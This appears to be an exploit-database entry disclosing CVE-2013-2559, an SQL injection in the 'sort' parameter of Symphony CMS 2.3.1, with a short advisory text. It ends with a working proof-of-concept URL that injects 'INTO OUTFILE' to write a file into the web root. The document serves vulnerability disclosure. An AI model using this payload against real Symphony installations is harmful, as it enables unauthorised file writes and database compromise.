Symphony - 'sort' SQL Injection
Author: High-Tech Bridge
type: webapps
platform: php
port:
date_added: 2013-04-03
date_updated: 2015-10-08
verified: 1
codes: CVE-2013-2559;OSVDB-91615
tags:
aliases:
screenshot_url:
application_url:
source: https://www.securityfocus.com/bid/58843/info
Symphony is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Symphony 2.3.1 is vulnerable; other versions may also be affected.
http://www.example.com/symphony/system/authors/?order=asc&sort=id%20INTO%20OUTFILE%20%27/var/www/file.txt%27%20--%20